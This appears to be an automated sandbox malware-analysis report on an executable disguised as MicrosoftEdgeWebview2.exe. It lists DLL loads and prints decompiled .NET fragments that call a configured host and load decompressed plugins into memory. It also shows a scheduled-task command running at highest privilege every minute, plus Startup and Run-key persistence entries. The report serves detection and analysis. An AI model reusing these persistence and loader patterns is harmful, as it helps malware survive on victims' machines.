            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: MicrosoftEdgeWebview2.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\MicrosoftEdgeWebview2.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: MicrosoftEdgeWebview2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: MicrosoftEdgeWebview2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: MicrosoftEdgeWebview2.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: MicrosoftEdgeWebview2.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: MicrosoftEdgeWebview2.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: MicrosoftEdgeWebview2.exe, Messages.cs.Net Code: Memory
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeCode function: 0_2_00007FFD9B6D53FA push es; iretd 0_2_00007FFD9B6D5627
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeCode function: 0_2_00007FFD9B6D3688 pushad ; ret 0_2_00007FFD9B6D36A1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeCode function: 0_2_00007FFD9B6D06F0 push es; iretd 0_2_00007FFD9B6D5627
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B5CD2A5 pushad ; iretd 1_2_00007FFD9B5CD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6E09CA push E95B2BD0h; ret 1_2_00007FFD9B6E09C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6E0943 push E95B2BD0h; ret 1_2_00007FFD9B6E09C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7B2316 push 8B485F91h; iretd 1_2_00007FFD9B7B231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B5BD2A5 pushad ; iretd 4_2_00007FFD9B5BD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7A2316 push 8B485F92h; iretd 4_2_00007FFD9B7A231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B59D2A5 pushad ; iretd 7_2_00007FFD9B59D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B6BBAE8 push E85B38D7h; ret 7_2_00007FFD9B6BBAF9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7853EF push FFFFFFE1h; ret 7_2_00007FFD9B785624
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B786605 push FFFFFFE1h; ret 7_2_00007FFD9B78662C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B788A19 push FFFFFFE1h; ret 7_2_00007FFD9B788A3C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B78464D push FFFFFFE1h; ret 7_2_00007FFD9B78466C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B78858A push FFFFFFE1h; ret 7_2_00007FFD9B78858C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B786198 push FFFFFFE1h; ret 7_2_00007FFD9B7861B4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7859A9 push FFFFFFE1h; ret 7_2_00007FFD9B7859CC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B789BA2 push FFFFFFE1h; ret 7_2_00007FFD9B789BA4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7891C9 push FFFFFFE1h; ret 7_2_00007FFD9B7893F4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B785FD9 push FFFFFFE1h; ret 7_2_00007FFD9B785FDC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7896F2 push FFFFFFE1h; ret 7_2_00007FFD9B7896F4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B785EF5 push FFFFFFE1h; ret 7_2_00007FFD9B785F1C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B78892C push FFFFFFE1h; ret 7_2_00007FFD9B788944
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B789521 push FFFFFFE1h; ret 7_2_00007FFD9B789544
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B788F35 push FFFFFFE1h; ret 7_2_00007FFD9B788F5C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B785131 push FFFFFFE1h; ret 7_2_00007FFD9B785134
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B787342 push FFFFFFE1h; ret 7_2_00007FFD9B78736C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B787342 push FFFFFFE1h; ret 7_2_00007FFD9B7874F4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B784A63 push FFFFFFE1h; ret 7_2_00007FFD9B784BC4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B789CA2 push FFFFFFE1h; ret 7_2_00007FFD9B789CA4
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnkJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnkJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeWebview2Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeWebview2Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
